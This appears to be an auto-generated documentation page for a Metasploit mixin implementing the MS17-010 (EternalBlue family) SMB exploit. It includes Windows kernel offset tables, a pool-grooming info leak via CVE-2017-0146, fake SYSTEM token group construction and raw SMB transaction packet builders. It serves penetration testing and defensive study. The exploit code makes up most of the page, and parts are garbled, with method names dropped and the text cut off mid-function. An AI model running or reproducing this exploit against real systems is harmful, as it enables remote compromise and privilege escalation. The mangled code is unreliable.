Module: Msf::Exploit::Remote::SMB::Client::Psexec_MS17_010
- Includes:
- PipeAuditor, Psexec, Tcp
- Defined in:
- lib/msf/core/exploit/remote/smb/client/psexec_ms17_010.rb
Defined Under Namespace
Classes: MS17_010_Error
Constant Summary
collapse
- CONST =
Rex::Proto::SMB::Constants
- WIN7_64_SESSION_INFO =
{
'SESSION_SECCTX_OFFSET'=> 0xa0,
'SESSION_ISNULL_OFFSET'=> 0xba,
'FAKE_SECCTX'=> [0x28022a, 1, 0, 0, 2, 0, 1].pack("VVQ<Q<VVC"), 'SECCTX_SIZE'=> 0x28,
}
- WIN7_32_SESSION_INFO =
{
'SESSION_SECCTX_OFFSET'=> 0x80,
'SESSION_ISNULL_OFFSET'=> 0x96,
'FAKE_SECCTX'=> [0x1c022a, 1, 0, 0, 2, 0, 1].pack("VVVVVVC"), 'SECCTX_SIZE'=> 0x1c,
}
- WIN8_64_SESSION_INFO =
{
'SESSION_SECCTX_OFFSET'=> 0xb0,
'SESSION_ISNULL_OFFSET'=> 0xca,
'FAKE_SECCTX'=> [0x38022a, 1, 0, 0, 0, 0, 2, 0, 1].pack("VVQ<Q<Q<Q<VVC"), 'SECCTX_SIZE'=> 0x38,
}
- WIN8_32_SESSION_INFO =
{
'SESSION_SECCTX_OFFSET'=> 0x88,
'SESSION_ISNULL_OFFSET'=> 0x9e,
'FAKE_SECCTX'=> [0x24022a, 1, 0, 0, 0, 0, 2, 0, 1].pack("VVVVVVVVC"), 'SECCTX_SIZE'=> 0x24,
}
- WIN2K3_64_SESSION_INFO =
win 2003 (xp 64 bit is win 2003)
{
'SESSION_ISNULL_OFFSET'=> 0xba,
'SESSION_SECCTX_OFFSET'=> 0xa0, 'SECCTX_PCTXTHANDLE_OFFSET'=> 0x10, 'PCTXTHANDLE_TOKEN_OFFSET'=> 0x40,
'TOKEN_USER_GROUP_CNT_OFFSET'=> 0x4c,
'TOKEN_USER_GROUP_ADDR_OFFSET'=> 0x68,
}
- WIN2K3_32_SESSION_INFO =
{
'SESSION_ISNULL_OFFSET'=> 0x96,
'SESSION_SECCTX_OFFSET'=> 0x80, 'SECCTX_PCTXTHANDLE_OFFSET'=> 0xc, 'PCTXTHANDLE_TOKEN_OFFSET'=> 0x24,
'TOKEN_USER_GROUP_CNT_OFFSET'=> 0x4c,
'TOKEN_USER_GROUP_ADDR_OFFSET'=> 0x68,
}
- WINXP_32_SESSION_INFO =
{
'SESSION_ISNULL_OFFSET'=> 0x94,
'SESSION_SECCTX_OFFSET'=> 0x84, 'PCTXTHANDLE_TOKEN_OFFSET'=> 0x24,
'TOKEN_USER_GROUP_CNT_OFFSET'=> 0x4c,
'TOKEN_USER_GROUP_ADDR_OFFSET'=> 0x68,
'TOKEN_USER_GROUP_CNT_OFFSET_SP0_SP1'=> 0x40,
'TOKEN_USER_GROUP_ADDR_OFFSET_SP0_SP1'=> 0x5c,
}
- WIN2K_32_SESSION_INFO =
{
'SESSION_ISNULL_OFFSET'=> 0x94,
'SESSION_SECCTX_OFFSET'=> 0x84, 'PCTXTHANDLE_TOKEN_OFFSET'=> 0x24,
'TOKEN_USER_GROUP_CNT_OFFSET'=> 0x3c,
'TOKEN_USER_GROUP_ADDR_OFFSET'=> 0x58,
}
- WIN7_32_TRANS_INFO =
{
'TRANS_SIZE' => 0xa0, 'TRANS_FLINK_OFFSET' => 0x18,
'TRANS_INPARAM_OFFSET' => 0x40,
'TRANS_OUTPARAM_OFFSET' => 0x44,
'TRANS_INDATA_OFFSET' => 0x48,
'TRANS_OUTDATA_OFFSET' => 0x4c,
'TRANS_PARAMCNT_OFFSET' => 0x58,
'TRANS_TOTALPARAMCNT_OFFSET' => 0x5c,
'TRANS_FUNCTION_OFFSET' => 0x72,
'TRANS_MID_OFFSET' => 0x80,
}
- WIN7_64_TRANS_INFO =
{
'TRANS_SIZE' => 0xf8, 'TRANS_FLINK_OFFSET' => 0x28,
'TRANS_INPARAM_OFFSET' => 0x70,
'TRANS_OUTPARAM_OFFSET' => 0x78,
'TRANS_INDATA_OFFSET' => 0x80,
'TRANS_OUTDATA_OFFSET' => 0x88,
'TRANS_PARAMCNT_OFFSET' => 0x98,
'TRANS_TOTALPARAMCNT_OFFSET' => 0x9c,
'TRANS_FUNCTION_OFFSET' => 0xb2,
'TRANS_MID_OFFSET' => 0xc0,
}
- WIN5_32_TRANS_INFO =
{
'TRANS_SIZE' => 0x98, 'TRANS_FLINK_OFFSET' => 0x18,
'TRANS_INPARAM_OFFSET' => 0x3c,
'TRANS_OUTPARAM_OFFSET' => 0x40,
'TRANS_INDATA_OFFSET' => 0x44,
'TRANS_OUTDATA_OFFSET' => 0x48,
'TRANS_PARAMCNT_OFFSET' => 0x54,
'TRANS_TOTALPARAMCNT_OFFSET' => 0x58,
'TRANS_FUNCTION_OFFSET' => 0x6e,
'TRANS_PID_OFFSET' => 0x78,
'TRANS_MID_OFFSET' => 0x7c,
}
- WIN5_64_TRANS_INFO =
{
'TRANS_SIZE' => 0xe0, 'TRANS_FLINK_OFFSET' => 0x28,
'TRANS_INPARAM_OFFSET' => 0x68,
'TRANS_OUTPARAM_OFFSET' => 0x70,
'TRANS_INDATA_OFFSET' => 0x78,
'TRANS_OUTDATA_OFFSET' => 0x80,
'TRANS_PARAMCNT_OFFSET' => 0x90,
'TRANS_TOTALPARAMCNT_OFFSET' => 0x94,
'TRANS_FUNCTION_OFFSET' => 0xaa,
'TRANS_PID_OFFSET' => 0xb4,
'TRANS_MID_OFFSET' => 0xb8,
}
- X86_INFO =
{
'ARCH' => 'x86',
'PTR_SIZE' => 4,
'PTR_FMT' => 'V',
'FRAG_TAG_OFFSET' => 12,
'POOL_ALIGN' => 8,
'SRV_BUFHDR_SIZE' => 8,
}
- X64_INFO =
{
'ARCH' => 'x64',
'PTR_SIZE' => 8,
'PTR_FMT' => 'Q<',
'FRAG_TAG_OFFSET' => 0x14,
'POOL_ALIGN' => 0x10,
'SRV_BUFHDR_SIZE' => 0x10,
}
- OS_ARCH_INFO =
{
'WIN7' => {
'x86' => {
'CPUARCH' => X86_INFO,
'OFFSETS' => WIN7_32_TRANS_INFO,
'SESSION' => WIN7_32_SESSION_INFO
},
'x64' => {
'CPUARCH' => X64_INFO,
'OFFSETS' => WIN7_64_TRANS_INFO,
'SESSION' => WIN7_64_SESSION_INFO
},
},
'WIN8' => {
'x86' => {
'CPUARCH' => X86_INFO,
'OFFSETS' => WIN7_32_TRANS_INFO,
'SESSION' => WIN8_32_SESSION_INFO
},
'x64' => {
'CPUARCH' => X64_INFO,
'OFFSETS' => WIN7_64_TRANS_INFO,
'SESSION' => WIN8_64_SESSION_INFO
},
},
'WINXP' => {
'x86' => {
'CPUARCH' => X86_INFO,
'OFFSETS' => WIN5_32_TRANS_INFO,
'SESSION' => WINXP_32_SESSION_INFO
},
'x64' => {
'CPUARCH' => X64_INFO,
'OFFSETS' => WIN5_64_TRANS_INFO,
'SESSION' => WIN2K3_64_SESSION_INFO
},
},
'WIN2K3' => {
'x86' => {
'CPUARCH' => X86_INFO,
'OFFSETS' => WIN5_32_TRANS_INFO,
'SESSION' => WIN2K3_32_SESSION_INFO
},
'x64' => {
'CPUARCH' => X64_INFO,
'OFFSETS' => WIN5_64_TRANS_INFO,
'SESSION' => WIN2K3_64_SESSION_INFO
},
},
'WIN2K' => {
'x86' => {
'CPUARCH' => X86_INFO,
'OFFSETS' => WIN5_32_TRANS_INFO,
'SESSION' => WIN2K_32_SESSION_INFO
},
},
}
- GROOM_TRANS_SIZE =
includes transaction name, parameters and data, multiple of 16 to make FRAG_TAG_OFFSET valid
0x5010
- TRANS_NAME_LEN =
4
- X64_FRAG_TAG_OFFSET =
0x14
- X64_POOL_ALIGN =
0x10
- X86_FRAG_TAG_OFFSET =
0x0c
- X86_POOL_ALIGN =
0x08
- @@last_multiplex_id =
1000 + Random.rand(20000)
- @@special_mid =
0
0
DCERPCClient, DCERPCPacket, DCERPCResponse, DCERPCUUID, NDR, SIMPLE, XCEPT
Constants included
from DCERPC
DCERPC::DCERPCClient, DCERPC::DCERPCPacket, DCERPC::DCERPCResponse, DCERPC::DCERPCUUID, DCERPC::NDR
Constants included
from DCERPC_LSA
DCERPC_LSA::NDR
Constants included
from DCERPC_MGMT
DCERPC_MGMT::NDR
Windows_Constants::CHANGE_SERVICE_CONFIG2_W, Windows_Constants::CHANGE_SERVICE_CONFIG_W, Windows_Constants::CLOSE_SERVICE_HANDLE, Windows_Constants::CONTROL_SERVICE, Windows_Constants::CREATE_SERVICE_W, Windows_Constants::DELETE_SERVICE, Windows_Constants::OPEN_SC_MANAGER_W, Windows_Constants::OPEN_SERVICE_W, Windows_Constants::QUERY_SERVICE_STATUS, Windows_Constants::SC_MANAGER_ALL_ACCESS, Windows_Constants::SC_MANAGER_CONNECT, Windows_Constants::SC_MANAGER_CREATE_SERVICE, Windows_Constants::SC_MANAGER_ENUMERATE_SERVICE, Windows_Constants::SC_MANAGER_LOCK, Windows_Constants::SC_MANAGER_MODIFY_BOOT_CONFIG, Windows_Constants::SC_MANAGER_QUERY_LOCK_STATUS, Windows_Constants::SERVICE_ACCEPT_HARDWAREPROFILECHANGE, Windows_Constants::SERVICE_ACCEPT_NETBINDCHANGE, Windows_Constants::SERVICE_ACCEPT_PARAMCHANGE, Windows_Constants::SERVICE_ACCEPT_PAUSE_CONTINUE, Windows_Constants::SERVICE_ACCEPT_POWEREVENT, Windows_Constants::SERVICE_ACCEPT_PRESHUTDOWN, Windows_Constants::SERVICE_ACCEPT_SESSIONCHANGE, Windows_Constants::SERVICE_ACCEPT_SHUTDOWN, Windows_Constants::SERVICE_ACCEPT_STOP, Windows_Constants::SERVICE_ACCEPT_TIMECHANGE, Windows_Constants::SERVICE_ACCEPT_TRIGGEREVENT, Windows_Constants::SERVICE_ACTIVE, Windows_Constants::SERVICE_ALL_ACCESS, Windows_Constants::SERVICE_AUTO_START, Windows_Constants::SERVICE_BOOT_START, Windows_Constants::SERVICE_CHANGE_CONFIG, Windows_Constants::SERVICE_CONFIG_DELAYED_AUTO_START_INFO, Windows_Constants::SERVICE_CONFIG_DESCRIPTION, Windows_Constants::SERVICE_CONFIG_FAILURE_ACTIONS, Windows_Constants::SERVICE_CONFIG_FAILURE_ACTIONS_FLAG, Windows_Constants::SERVICE_CONFIG_LAUNCH_PROTECTED, Windows_Constants::SERVICE_CONFIG_PREFERRED_NODE, Windows_Constants::SERVICE_CONFIG_PRESHUTDOWN_INFO, Windows_Constants::SERVICE_CONFIG_REQUIRED_PRIVILEGES_INFO, Windows_Constants::SERVICE_CONFIG_SERVICE_SID_INFO, Windows_Constants::SERVICE_CONFIG_TRIGGER_INFO, Windows_Constants::SERVICE_CONTINUE_PENDING, Windows_Constants::SERVICE_CONTROL_CONTINUE, Windows_Constants::SERVICE_CONTROL_DEVICEEVENT, Windows_Constants::SERVICE_CONTROL_HARDWAREPROFILECHANGE, Windows_Constants::SERVICE_CONTROL_INTERROGATE, Windows_Constants::SERVICE_CONTROL_NETBINDADD, Windows_Constants::SERVICE_CONTROL_NETBINDDISABLE, Windows_Constants::SERVICE_CONTROL_NETBINDENABLE, Windows_Constants::SERVICE_CONTROL_NETBINDREMOVE, Windows_Constants::SERVICE_CONTROL_PARAMCHANGE, Windows_Constants::SERVICE_CONTROL_PAUSE, Windows_Constants::SERVICE_CONTROL_POWEREVENT, Windows_Constants::SERVICE_CONTROL_PRESHUTDOWN, Windows_Constants::SERVICE_CONTROL_SESSIONCHANGE, Windows_Constants::SERVICE_CONTROL_SHUTDOWN, Windows_Constants::SERVICE_CONTROL_STOP, Windows_Constants::SERVICE_CONTROL_TIMECHANGE, Windows_Constants::SERVICE_CONTROL_TRIGGEREVENT, Windows_Constants::SERVICE_DEMAND_START, Windows_Constants::SERVICE_DISABLED, Windows_Constants::SERVICE_ENUMERATE_DEPENDENTS, Windows_Constants::SERVICE_ERROR_IGNORE, Windows_Constants::SERVICE_INACTIVE, Windows_Constants::SERVICE_INTERACTIVE_PROCESS, Windows_Constants::SERVICE_INTERROGATE, Windows_Constants::SERVICE_NO_CHANGE, Windows_Constants::SERVICE_PAUSED, Windows_Constants::SERVICE_PAUSE_CONTINUE, Windows_Constants::SERVICE_PAUSE_PENDING, Windows_Constants::SERVICE_QUERY_CONFIG, Windows_Constants::SERVICE_QUERY_STATUS, Windows_Constants::SERVICE_RUNNING, Windows_Constants::SERVICE_RUNS_IN_SYSTEM_PROCESS, Windows_Constants::SERVICE_START, Windows_Constants::SERVICE_START_PENDING, Windows_Constants::SERVICE_STATE_ALL, Windows_Constants::SERVICE_STOP, Windows_Constants::SERVICE_STOPPED, Windows_Constants::SERVICE_STOP_PENDING, Windows_Constants::SERVICE_SYSTEM_START, Windows_Constants::SERVICE_USER_DEFINED_CONTROL, Windows_Constants::SERVICE_WIN32_OWN_PROCESS, Windows_Constants::STANDARD_RIGHTS_REQUIRED
Instance Attribute Summary
Attributes included from Tcp
#sock
#simple
Attributes included from DCERPC
#dcerpc, #handle
Instance Method Summary
collapse
-
#align_transaction_and_leak(pipe_handle) ⇒ Object
This will (just) leak info using the RCE from ETERNALCHAMPION CVE-2017-0146 - Race condition with Transaction requests.
-
#bin_to_hex(s) ⇒ Object
-
#calc_alloc_size(size, align_size) ⇒ Object
-
#create_fake_SYSTEM_UserAndGroups(userAndGroupCount, userAndGroupsAddr) ⇒ Object
-
#create_nt_trans_packet(subcommand, tid: nil, uid: nil, pid: nil, mid: nil, setup: '', param: '', data: '', maxSetupCount: nil, totalParameterCount: nil, totalDataCount: nil, maxParameterCount: nil, maxDataCount: nil) ⇒ Object
-
#create_nt_trans_secondary_packet(tid: nil, uid: nil, pid: nil, mid: nil, wct: 18, param: '', paramDisplacement: 0, data: '', dataDisplacement: 0) ⇒ Object
-
#create_trans_packet(tid: nil, uid: nil, pid: nil, mid: nil, setup: '', param: '', data: '', maxSetupCount: nil, totalParameterCount: nil, totalDataCount: nil, maxParameterCount: nil, maxDataCount: nil) ⇒ Object
-
#create_trans_secondary_packet(tid: nil, uid: nil, pid: nil, mid: nil, param: '', paramDisplacement: 0, data: '', dataDisplacement: 0) ⇒ Object
-
#do_smb_echo(tid: nil, uid: nil, pid: nil, mid: nil, data: nil) ⇒ Object
-
#do_write_andx_raw_pipe(fid: 0, data: '', tid: nil, uid: nil, pid: nil, mid: nil) ⇒ Object
-
#eternal_cleanup ⇒ Object
-
#eternal_pwn(ip) ⇒ Object
-
#exploit_fish_barrel(pipe_handle) ⇒ Object
-
#exploit_matched_pairs(pipe_handle) ⇒ Object
todo: spice it up with EternalSynergy output.
-
#find_accessible_named_pipe ⇒ Object
-
#fingerprint_os(os) ⇒ Object
-
#get_group_data_from_token(tokenData) ⇒ Object
-
#initialize(info = {}) ⇒ Object
-
#leak_frag_size(fid) ⇒ Object
Large pool allocation in NT Trans adds the tags Frag and Free to data returned.
-
#modify_token ⇒ Object
-
#next_extra_multiplex_id ⇒ Object
-
#next_multiplex_id ⇒ Object
-
#pick_ctx ⇒ Object
-
#put_trans_data(pkt, len: 0, param: '', data: '', noPad: false) ⇒ Object
Note: Setup length is included when len(param) is called.
-
#read_data(read_addr, read_size) ⇒ Object
-
#recv_transaction_data(mid, len) ⇒ Object
-
#reset_extra_multiplex_id ⇒ Object
-
#set_smb1_headers(pkt, tid: nil, uid: nil, pid: nil, mid: nil) ⇒ Object
Sets common SMB1 Header values used by the various packets in the exploit.
-
#smb_send_recv_raw(raw) ⇒ Object
-
#validate_token_offset(tokenData, userAndGroupCountOffset, userAndGroupsAddrOffset) ⇒ Object
-
#write_what_where(what, where) ⇒ Object
Methods included from Tcp
#chost, #cleanup, #connect, #connect_timeout, #cport, #disconnect, #handler, #lhost, #lport, #peer, #print_prefix, #proxies, #rhost, #rport, #set_tcp_evasions, #shutdown, #ssl, #ssl_cipher, #ssl_verify_mode, #ssl_version
#check_named_pipes
#connect, #domain, #domain_username_split, #smb_create, #smb_direct, #smb_enumprinters, #smb_enumprintproviders, #smb_file_exist?, #smb_file_rm, #smb_fingerprint, #smb_fingerprint_windows_lang, #smb_fingerprint_windows_sp, #smb_hostname, #smb_lanman_netshareenumall, #smb_login, #smb_lookup_share_type, #smb_netshareenumall, #smb_netsharegetinfo, #smb_open, #smb_peer_lm, #smb_peer_os, #smb_srvsvc_netshareenumall, #smb_srvsvc_netsharegetinfo, #smbhost, #splitname, #unicode
Methods included from Psexec
#display_name, #execute_command, #execute_command_payload, #execute_command_with_output, #execute_powershell_payload, #mof_upload, #native_upload, #powershell_installed?, #psexec, #service_description, #service_name, #smb_read_file
#kerberos_auth_options
#kerberos_storage_options, #kerberos_ticket_storage, store_ccache
Methods included from DCERPC
#dcerpc_bind, #dcerpc_call, #dcerpc_getarch, #dcerpc_handle, #unicode
Methods included from DCERPC_LSA
#lsa_open_policy
#dcerpc_mgmt_connect, #dcerpc_mgmt_inq_if_ids, #dcerpc_mgmt_inq_if_stats, #dcerpc_mgmt_inq_princ_name, #dcerpc_mgmt_is_server_listening, #dcerpc_mgmt_stop_server_listening
Methods included from DCERPC_EPM
#dcerpc_endpoint_find_tcp, #dcerpc_endpoint_find_udp, #dcerpc_endpoint_list
Instance Method Details
#align_transaction_and_leak(pipe_handle) ⇒ Object
This will (just) leak info using the RCE from ETERNALCHAMPION CVE-2017-0146 - Race condition with Transaction requests
474
475
476
477
478
479
480
481
482
483
484
485
486
487
488
489
490
491
492
493
494
495
496
497
498
499
500
501
502
503
504
505
506
507
508
509
510
511
512
513
514
515
516
517
518
519
520
521
522
523
524
525
526
527
528
529
530
531
532
533
534
535
536
537
538
539
540
541
542
543
544
545
546
547
548
549
550
551
552
553
554
555
556
557
558
559
560
561
562
563
564
565
566
567
568
569
570
571
572
573
574
575
576
577
578
579
580
581
582
583
584
585
586
|
# File 'lib/msf/core/exploit/remote/smb/client/psexec_ms17_010.rb', line 474
def align_transaction_and_leak(pipe_handle)
op = ::Rex::Proto::SMB::Constants::NT_TRANSACT_RENAME
trans_param = [pipe_handle.file_id].pack("V")
for i in 0..3
mid = next_multiplex_id()
pkt = create_nt_trans_packet(op, param: trans_param, mid: mid,
totalDataCount: 0x10d0,
maxParameterCount: GROOM_TRANS_SIZE - 0x10d0)
self.simple.client.smb_send(pkt.to_s)
end
mid_ntrename = next_multiplex_id()
req1 = create_nt_trans_packet(op, param: trans_param, mid: mid_ntrename, data: Rex::Text.rand_text_alpha(0x10d0), maxParameterCount: @ctx['GROOM_DATA_SIZE']-0x10d0)
req2 = create_nt_trans_secondary_packet(mid: mid_ntrename, data: Rex::Text.rand_text_alpha(276))
req3 = create_nt_trans_packet(op, param: trans_param, mid: pipe_handle.file_id,
totalDataCount: @ctx['GROOM_DATA_SIZE']-0x1000, maxParameterCount: 0x1000)
reqs = ''
for i in 0..11
mid = ()
req = create_trans_packet(mid: mid, param: trans_param, totalDataCount: @ctx['BRIDE_DATA_SIZE']-0x200,
totalParameterCount: 0x200, maxDataCount: 0, maxParameterCount: 0)
reqs += req.to_s
end
self.simple.client.smb_send(req1.to_s[0..-9])
self.simple.client.smb_send(req1.to_s[-8..-1] + req2.to_s + req3 .to_s + reqs)
leakData = recv_transaction_data(mid_ntrename, 0x10d0 + 276)
leakData = leakData[0x10d4..-1]
if !(leakData[@ctx['FRAG_TAG_OFFSET']..-1].starts_with? 'Frag')
vprint_error("Frag pool tag not found at correct offset!")
return nil
end
start = @ctx['FRAG_TAG_OFFSET'] - 4 + @ctx['FRAG_POOL_SIZE']
leakData = leakData[start..-1]
expected_size = [@ctx['BRIDE_TRANS_SIZE']].pack("v") leakTransOffset = @ctx['POOL_ALIGN'] + @ctx['SRV_BUFHDR_SIZE']
if leakData[0x4..0x8 - 1] != 'LStr' ||
leakData[@ctx['POOL_ALIGN'] .. @ctx['POOL_ALIGN'] + 2 - 1] != expected_size ||
leakData[leakTransOffset + 2 .. leakTransOffset + 4 - 1] != expected_size
vprint_error("Transaction struct missing from leak data!")
return nil
end
leakTrans = leakData[leakTransOffset..-1]
ptrf = @ctx['PTR_FMT']
_, connection_addr, session_addr, treeconnect_addr, flink_value = leakTrans[0x8..-1].unpack(ptrf * 5) inparam_value = leakTrans[@ctx['TRANS_INPARAM_OFFSET']..-1].unpack(ptrf)[0] leak_mid = leakTrans[@ctx['TRANS_MID_OFFSET']..-1].unpack("v")[0]
if datastore['DBGTRACE']
print_status("CONNECTION: 0x#{connection_addr.to_s(16)}")
print_status("SESSION: 0x#{session_addr.to_s(16)}")
print_status("FLINK: 0x#{flink_value.to_s(16)}")
print_status("InParam: 0x#{inparam_value.to_s(16)}")
print_status("MID: 0x#{leak_mid.to_s(16)}")
end
next_page_addr = (inparam_value & 0xfffffffffffff000) + 0x1000
if next_page_addr + @ctx['GROOM_POOL_SIZE'] + @ctx['FRAG_POOL_SIZE'] + @ctx['POOL_ALIGN'] + @ctx['SRV_BUFHDR_SIZE'] + @ctx['TRANS_FLINK_OFFSET'] != flink_value
delta = flink_value - next_page_addr
if datastore['DBGTRACE']
print_error("Unexpected Flink alignment, delta: #{delta.to_s(16)}")
end
return nil
end
return {
'connection' => connection_addr,
'session' => session_addr,
'next_page_addr' => next_page_addr,
'trans1_mid' => leak_mid,
'trans1_addr' => inparam_value - @ctx['TRANS_SIZE'] - TRANS_NAME_LEN,
'trans2_addr' => flink_value - @ctx['TRANS_FLINK_OFFSET'],
}
end
|
#bin_to_hex(s) ⇒ Object
882
883
884
|
# File 'lib/msf/core/exploit/remote/smb/client/psexec_ms17_010.rb', line 882
def bin_to_hex(s)
s.each_byte.map { |b| "%02x" % b }.join
end
|
#calc_alloc_size(size, align_size) ⇒ Object
1167
1168
1169
|
# File 'lib/msf/core/exploit/remote/smb/client/psexec_ms17_010.rb', line 1167
def calc_alloc_size(size, align_size)
return (size + align_size - 1) & ~(align_size - 1)
end
|
#create_fake_SYSTEM_UserAndGroups(userAndGroupCount, userAndGroupsAddr) ⇒ Object
813
814
815
816
817
818
819
820
821
822
823
824
825
826
827
828
829
830
831
832
833
834
835
836
837
838
839
840
841
842
843
844
|
# File 'lib/msf/core/exploit/remote/smb/client/psexec_ms17_010.rb', line 813
def create_fake_SYSTEM_UserAndGroups(userAndGroupCount, userAndGroupsAddr)
xSID_SYSTEM = "\x01\x01\x00\x00\x00\x00\x00\x05\x12\x00\x00\x00" xSID_ADMINISTRATORS = "\x01\x02\x00\x00\x00\x00\x00\x05\x20\x00\x00\x00\x20\x02\x00\x00" xSID_AUTHENICATED_USERS = "\x01\x01\x00\x00\x00\x00\x00\x05\x0b\x00\x00\x00" xSID_EVERYONE = "\x01\x01\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00" sids = [ xSID_SYSTEM, xSID_ADMINISTRATORS, xSID_EVERYONE, xSID_AUTHENICATED_USERS ]
attrs = [ 0, 0xe, 7, 7 ]
fakeUserAndGroupCount = [userAndGroupCount, 4].min fakeUserAndGroupsAddr = userAndGroupsAddr
addr = fakeUserAndGroupsAddr + (fakeUserAndGroupCount * @ctx['PTR_SIZE'] * 2)
fakeUserAndGroups = ""
for i in 0..fakeUserAndGroupCount -1 sid = sids[i]
atr = attrs[i]
fakeUserAndGroups << [addr, atr].pack(@ctx['PTR_FMT'] * 2)
addr += sid.length
end
for i in 0..fakeUserAndGroupCount -1
fakeUserAndGroups << sids[i]
end
return fakeUserAndGroupCount, fakeUserAndGroups
end
|
#create_nt_trans_packet(subcommand, tid: nil, uid: nil, pid: nil, mid: nil, setup: '', param: '', data: '', maxSetupCount: nil, totalParameterCount: nil, totalDataCount: nil, maxParameterCount: nil, maxDataCount: nil) ⇒ Object
912
913
914
915
916
917
918
919
920
921
922
923
924
925
926
927
928
929
930
931
932
933
|
# File 'lib/msf/core/exploit/remote/smb/client/psexec_ms17_010.rb', line 912
def create_nt_trans_packet(subcommand, tid: nil, uid: nil, pid: nil, mid: nil, setup: '', param: '', data: '', maxSetupCount: nil, totalParameterCount: nil, totalDataCount: nil, maxParameterCount: nil, maxDataCount: nil)
pkt = CONST::SMB_NTTRANS_PKT.make_struct
(pkt, tid: tid, uid: uid, pid: pid, mid: mid)
pkt['Payload']['SMB'].v['Command'] = CONST::SMB_COM_NT_TRANSACT
pkt['Payload']['SMB'].v['WordCount'] = 19 + setup.length
pkt['Payload'].v['ParamCountTotal'] = if totalParameterCount != nil then totalParameterCount else param.length end
pkt['Payload'].v['DataCountTotal'] = if totalDataCount != nil then totalDataCount else data.length end
pkt['Payload'].v['ParamCountMax'] = if maxParameterCount != nil then maxParameterCount else param.length end
pkt['Payload'].v['DataCountMax'] = if maxDataCount != nil then maxDataCount else data.length end pkt['Payload'].v['ParamCount'] = param.length
pkt['Payload'].v['DataCount'] = data.length
pkt['Payload'].v['SetupCount'] = setup.length
pkt['Payload'].v['SetupData'] = setup
pkt['Payload'].v['Subcommand'] = subcommand
pkt = put_trans_data(pkt, data: data, param: param)
return pkt
end
|
#create_nt_trans_secondary_packet(tid: nil, uid: nil, pid: nil, mid: nil, wct: 18, param: '', paramDisplacement: 0, data: '', dataDisplacement: 0) ⇒ Object
935
936
937
938
939
940
941
942
943
944
945
946
947
948
949
950
951
|
# File 'lib/msf/core/exploit/remote/smb/client/psexec_ms17_010.rb', line 935
def create_nt_trans_secondary_packet(tid: nil, uid: nil, pid: nil, mid: nil, wct: 18, param: '', paramDisplacement: 0, data: '', dataDisplacement: 0)
pkt = CONST::SMB_NTTRANS_SECONDARY_PKT.make_struct
(pkt, tid: tid, uid: uid, pid: pid, mid: mid)
pkt['Payload']['SMB'].v['Command'] = CONST::SMB_COM_NT_TRANSACT_SECONDARY
pkt['Payload']['SMB'].v['WordCount'] = wct
pkt['Payload'].v['ParamCountTotal'] = param.length
pkt['Payload'].v['DataCountTotal'] = data.length
pkt['Payload'].v['ParamCount'] = param.length
pkt['Payload'].v['DataCount'] = data.length
pkt['Payload'].v['DataDisplace'] = dataDisplacement
pkt['Payload'].v['ParamDisplace'] = paramDisplacement
pkt = put_trans_data(pkt, data: data, param: param)
pkt
end
|
#create_trans_packet(tid: nil, uid: nil, pid: nil, mid: nil, setup: '', param: '', data: '', maxSetupCount: nil, totalParameterCount: nil, totalDataCount: nil, maxParameterCount: nil, maxDataCount: nil) ⇒ Object
953
954
955
956
957
958
959
960
961
962
963
964
965
966
967
968
969
970
971
972
973
974
975
|
# File 'lib/msf/core/exploit/remote/smb/client/psexec_ms17_010.rb', line 953
def create_trans_packet(tid: nil, uid: nil, pid: nil, mid: nil, setup: '', param: '', data: '', maxSetupCount: nil, totalParameterCount: nil, totalDataCount: nil, maxParameterCount: nil, maxDataCount: nil)
pkt = CONST::SMB_TRANS_PKT.make_struct
(pkt, tid: tid, uid: uid, pid: pid, mid: mid)
pkt['Payload']['SMB'].v['Command'] = CONST::SMB_COM_TRANSACTION
pkt['Payload']['SMB'].v['WordCount'] = 14 + setup.length
pkt['Payload'].v['ParamCountTotal'] = if totalParameterCount != nil then totalParameterCount else param.length end
pkt['Payload'].v['DataCountTotal'] = if totalDataCount != nil then totalDataCount else data.length end
pkt['Payload'].v['ParamCountMax'] = if maxParameterCount != nil then maxParameterCount else param.length end
pkt['Payload'].v['DataCountMax'] = if maxDataCount != nil then maxDataCount else data.length end
pkt['Payload'].v['ParamCount'] = param.length
pkt['Payload'].v['DataCount'] = data.length
pkt['Payload'].v['SetupCount'] = setup.length
pkt['Payload'].v['SetupData'] = setup
pkt['Payload'].v['Flags'] = 0
pkt['Payload'].v['Timeout'] = 0xffffffff
pkt = put_trans_data(pkt, data: data, param: param)
pkt
end
|
#create_trans_secondary_packet(tid: nil, uid: nil, pid: nil, mid: nil, param: '', paramDisplacement: 0, data: '', dataDisplacement: 0) ⇒ Object
1009
1010
1011
1012
1013
1014
1015
1016
1017
1018
1019
1020
1021
1022
1023
1024
1025
1026
1027
1028
1029
1030
1031
1032
1033
1034
1035
1036
1037
1038
1039
1040
1041
1042
1043
1044
1045
|
# File 'lib/msf/core/exploit/remote/smb/client/psexec_ms17_010.rb', line 1009
def create_trans_secondary_packet(tid: nil, uid: nil, pid: nil, mid: nil, param: '', paramDisplacement: 0, data: '', dataDisplacement: 0)
pkt = CONST::SMB_BASE_PKT.make_struct
(pkt, tid: tid, uid: uid, pid: pid, mid: mid)
param = param.b
data = data.b
pkt['Payload']['SMB'].v['Command'] = CONST::SMB_COM_TRANSACTION_SECONDARY
pkt['Payload']['SMB'].v['WordCount'] = 8
base_offset = 51 param_offset = if param != '' then base_offset else 0 end
data_offset = if data != '' then base_offset + param.length else 0 end
raw = pkt.to_s[0..-3]
raw << [param.length].pack("v") raw << [data.length].pack("v") raw << [param.length].pack("v") raw << [param_offset].pack("v") raw << [paramDisplacement].pack("v") raw << [data.length].pack("v") raw << [data_offset].pack("v")
raw << [dataDisplacement].pack("v")
payload = param + data
raw << [payload.length].pack("v")
raw += param + data
raw = raw[4..-1]
nbss = [raw.length].pack("N")
raw = nbss + raw
return raw
end
|
#do_smb_echo(tid: nil, uid: nil, pid: nil, mid: nil, data: nil) ⇒ Object
1085
1086
1087
1088
1089
1090
1091
1092
1093
1094
1095
1096
1097
1098
1099
1100
1101
1102
1103
1104
1105
1106
1107
1108
1109
1110
1111
|
# File 'lib/msf/core/exploit/remote/smb/client/psexec_ms17_010.rb', line 1085
def do_smb_echo(tid: nil, uid: nil, pid: nil, mid: nil, data: nil)
if data == nil
data = Rex::Text.rand_text_alpha(1) end
pkt = CONST::SMB_BASE_PKT.make_struct
(pkt, tid: tid, uid: uid, pid: pid, mid: mid)
pkt['Payload']['SMB'].v['Command'] = CONST::SMB_COM_ECHO
pkt['Payload']['SMB'].v['WordCount'] = 1
raw = pkt.to_s[0..-3]
